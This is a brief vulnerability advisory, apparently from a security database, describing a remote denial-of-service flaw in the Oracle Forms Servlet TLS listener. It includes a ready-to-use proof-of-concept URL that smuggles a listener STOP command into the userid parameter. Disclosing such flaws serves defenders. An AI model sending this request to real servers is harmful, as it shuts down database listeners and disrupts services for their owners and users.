|
Oracle Forms Servlet TLS Listener Remote Denial Of Service Vulnerability
An exploit is not required. The following proof of concept example is available: http://www.example.com:8888/forms90/f90servlet?form=test.fmx&userid=SCOTT/TIGER@(DESCRIPTION=(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)(HOST=server)(PORT=1521)))(CONNECT_DATA=(COMMAND=STOP)(SERVICE=LISTENER)))&buffer_records=NO&debug_messages=NO&array=YES&query_only=NO&quiet=NO&RENDER=YES |
|
Privacy Statement |